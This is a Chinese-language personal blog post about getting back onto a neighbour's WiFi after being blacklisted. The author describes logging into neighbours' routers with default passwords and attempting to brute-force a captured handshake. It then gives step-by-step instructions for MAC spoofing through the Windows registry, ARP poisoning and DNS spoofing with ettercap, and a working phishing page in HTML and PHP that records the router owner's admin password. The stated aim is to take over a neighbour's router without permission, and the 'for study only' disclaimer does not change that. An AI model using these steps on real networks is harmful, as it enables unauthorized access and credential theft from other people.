記筆記本 mac 地址被隔壁 WiFi 拉黑以後

背景

筆者,也就是千千。

千千寒假所居住的地方沒有自己搭建的 WiFi,這讓整天沉迷於網絡的自己怎能忍受,打開 WiFi 列表,大致現在是這個樣子滴。

img

於是祭出第一道神器 —— WiFi 萬能鑰匙,因爲我想周邊的人一定有很多都使用這款軟件,那他們的 WiFi 密碼一定也相應的被上傳到了萬能鑰匙的服務器了吧!

PS: 萬能鑰匙也有微信小程序啦~ 這樣便可以少裝一款軟件啦~

img

果不其然,列表中的 TP-LINK_B386TP-LINK_5FE7fuzhengMERCURY_leixp 等都可以這樣直接連接上咯~

But, 除了 TP-LINK_B386 信號滿格以外,其他 WiFi 全部時不時掉線,且網速很慢的說~

於是,對 WiFi 的選擇當然是首選 TP-LINK_B386 , 其次 TP-LINK_5FE7 (雖然這一個也是很慢,前幾場參加 cf 題面一直加載不出來��),其他的直接忽略 >﹏<

 

試了試進入路由器後臺,發現默認的密碼 123456 果然都沒有被修改過��,好多人的安全意識還不是那麼強欸~

img

於是,善良的千千只是轉了一圈便離開了~

 

從此,千千開始過着有 TP-LINK_B386 無憂無慮的生活,直到某一天……

那一天,突然發現自己無論如何也連接不到這個 WiFi 了,試過萬能鑰匙等其他軟件都是無解。

初步的判斷是:WiFi 主人修改了密碼(強度很高的那種),然後萬能鑰匙等程序的服務器沒有更新(因爲查看到的密碼還是原來那一個)。

嘗試抓包暴力破解,可能是字典不太好吧!一個億的數據中沒有一個是正確的。(此時千千已經開始懷疑真實密碼的強度到底有多高)

 

某天,閒來無事打開自己的另一個手機,發現成功連接到了 TP-LINK_B386 ,於是果斷判斷,WiFi 的密碼並沒有更改,只不過是我自己的 mac 地址被拉黑了。

嘗試手機進入路由器後臺,發現默認密碼 123456 也無法成功登錄了,好英明的 WiFi 主人~

 

要是千千,一定會默默修改自己的 WiFi 密碼,可能是因爲強迫症不想看到自己的黑名單裏有記錄吧~

所以呀~ 如今自己的 mac 被拉黑了,還如何好好的玩耍了呢?

 

發展

mac 被拉黑了,怎麼辦呢?

當然可以僞裝一個 mac 繼續愉快的玩耍啦~ 可是這樣治標不治本,千千的手機還是沒辦法正常使用的說~

那就臨時先這樣吧~ 千千自己購買的路由器順豐已經有兩天沒有更新物流信息了,不知道有沒有遇到什麼危險呢~

等路由器到了以後,僞裝 mac 橋接 WiFi 這樣的構思不算很過分吧~

呀~ 開始正題啦~

 

僞裝自己的 mac 地址

因爲 Linux 僞裝 mac 的設置在網絡連接中可以很容易的找到,於是在這裏我們只介紹 Windows 。

 

有線網卡

以前聽計算機網絡老師講過這裏,有線網卡的 mac 地址修改還算比較簡單的啦~

  1. 首先打開網絡適配器設置

    img

  2. 打開有線網卡屬性裏的配置

    img

  3. 然後在 “高級” 選項裏便可以找到網絡地址啦~ 這裏的值需要填寫十六進制共十二個字符啦~ (省略中間的橫槓,如 0291F6DDA56E

    img

  4. 執行 ipconfig /all 便可以發現你的 mac 地址已經被修改啦~(想要恢復的話仍然按照原來的操作將其值設爲不存在即可)

 

無線網卡

關於無線網卡的 mac 地址修改不同於有線網卡的是設備的驅動程序並沒有提供像有線網卡一樣的修改位置。

img

也就是說一般情況下我們在這裏是找不到那麼一個選項啦~ (圖上的 Network Address 是做完以下事情後纔出現的)

 

萬能的註冊表提供給我們一種解決方案:

  1. 運行 regedit 打開註冊表

  2. 定位到 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\ ,從 0000 起,鼠標選中,查看右側,判斷名稱爲 DriverDesc 的項目數據是否爲自己的 [無線/有線] 網卡

    img

  3. 按照有線網卡的樣子我們在無線網卡里同樣的位置添加 NetworkAddress 這一項即可(圖中 0002 是我的有線網卡, 0004 是我的無線網卡)

    img

  4. 剩下的工作便和有線網卡更改 mac 地址的過程類似啦~ 祝大家好運~

 

強調部分

在無線網卡的 mac 地址修改中,首字節必須爲 02 纔可用,具體的原因就不知道咯~

首先,有線網卡中不存在這種問題,不需要設置首字節爲 02

其次,Windows XP 的無線網卡也沒有這種問題

只有 Windows Vista 或者更高版本的無線網卡,才存在此問題

 

至此,我們成功僞裝了自己的 mac 地址,於是便可以輕輕鬆鬆的使用原密碼登錄 WiFi 啦~

(如果再次被拉入黑名單的話我們還可以僞裝成另一個新的 mac 地址)

 

如何解禁自己的設備

目前我們正處於內網之中,想要更深入的工作便是內網滲透的範疇了。

前面我們講過僞裝 mac 只是一種治標不治本的做法,而想要真正的治療,首先要想辦法解禁自己的設備。

解禁設備,當然要獲取路由器管理員密碼咯~

在此我們使用本機作爲攻擊目標,虛擬機主機作爲攻擊者主機。(實驗環境)

 

網絡環境

目標主機操作系統:Windows 10

目標主機 ip:192.168.1.104

目標主機 mac:02:91:F6:DA:A2:5E

 

攻擊者主機操作系統:kali 2.0

攻擊者主機 ip:192.168.1.106

攻擊者主機 mac:f0:b4:29:33:5f:21

 

網關 ip:192.168.1.1

網關 mac:8c-a6-df-e0-b3-96

 

思路

  1. 首先 arp 毒化整個局域網,開啓轉發作爲中間人(這樣就可以查看所有經過的數據包啦)
  2. 然後 dns 欺騙使得目標主機訪問到我們所設定的釣魚網站
  3. 積攢 rp 等待成果?

 

實施

搭建釣魚網站

這裏隨便寫了兩個頁面啦~ 代碼也比較醜~

開啓 apache2 服務,使得訪問攻擊者主機 ip: 192.168.1.106 可正常顯示 index.html

當 WiFi 主人輸入密碼後跳轉至 index.php 記錄密碼然後跳轉至路由器登錄界面。

那麼有一個問題,當 WiFi 主人輸入了錯誤的密碼該怎麼辦呢?

別忘了我們此時是中間人的存在哦~ 就算是錯誤的密碼,那之後的路由器登錄界面還是會記錄真實密碼的。

 

index.html

<script>
var pass = '';
while(pass=='' || pass == null)
{
    pass = prompt("檢測到您當前的網絡環境不穩定,建議將 wifi 可疑設備移除\n管理員密碼:");
}
window.location.href='index.php?password=' + pass;
</script>

 

index.php

<?php
    $pass = $_GET['password'];
    $file = fopen("password.txt","a+");
    fwrite($file,$pass.' ');
    fclose($file);
?>
<script language="javascript" type="text/javascript">   
    window.location.href='http://192.168.1.1';  
</script>  

 

開始內網滲透

ettercap 是 Linux 下一款強大的欺騙工具,當然 Windows 也能用,它整合了很多很多有用的操作。

  1. 打開終端輸入 ettercap -G 進入圖形化的界面

    img

  2. 點擊 sniff ,選擇 unified sniffing 然後根據自己的需要選擇要抓包的網卡(這裏我們使用 wlan0

    img

  3. 點擊 Host ,選擇 Scan for hosts ,然後在 Hosts list 中查看當前局域網下的設備

    img

  4. 將目標主機 192.168.1.104 加爲 Target 1,網關 192.168.1.1 加爲 Target 2

    img

  5. 選擇 Mitm , ARP poisoning , Sniff remote connections ,然後點擊確定,此時網絡已被 arp 毒化,我們便是中間人,點擊 Start 裏的 Start sniffing 開始嗅探

    img

  6. 查看 arp 緩存,發現攻擊前的網關 mac 的確是真實的,而攻擊後的網關地址顯示爲攻擊者主機的 mac 地址,也就是說接下來我們訪問互聯網的所有網絡請求都會經過攻擊者的主機,至此 arp 欺騙成功

    img

    測試上網一切正常,在被攻擊者的眼中,目前什麼也沒有變化,他並不知道自己與網關中間是否有第三者(當然這只是針對普通人啦~)

    img

    此時我們便可以在 ettercap 中看到所有經過的數據

    img

  7. 進行 dns 欺騙使得被攻擊者訪問的所有域名全部解析到攻擊者主機,用 vim 打開 /etc/ettercap/etter.dns

    img

  8. 在適當位置加入以下部分(這裏的 192.168.1.106 爲攻擊者主機 ip,類似於 hosts),保存並退出

    *               A       192.168.1.106
    *               PTR     192.168.1.106
  9. ettercap 中點擊 Plugins ,選擇 Manage the plugins ,找到 dns_spoof 雙擊並啓用該插件,此時 dns 欺騙成功

    img

  10. 打開任意一個非 https 的網站,發現其 dns 域名解析已經成功變爲攻擊者主機 ip 了,顯然打開的是我們之前建立的釣魚網站

    img

  11. 我們隨意輸入一個密碼:12345678,吶~ 成功跳轉至路由器登錄界面

    img

  12. 然後再看看攻擊者主機下所記錄的密碼,成功獲取,至此我們便得到了最重要的管理員密碼

    img

    img

 

解封設備

有了管理員密碼,解封設備當然就變得簡簡單單咯~

img

如圖已清空,終於可以再一次無憂無慮的網啦~

 

後話

果然這種長篇一步一步的文章還是不適合千千呢~

從早晨寫到下午終於寫完啦~

中途突然又覺得文章的內容太簡單想放棄,不過還是堅持下來了~

就當是一次完整的記錄咯~


另,此文章僅供學習,測試請儘量自建環境~

切勿越過法律的邊緣~ ��

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章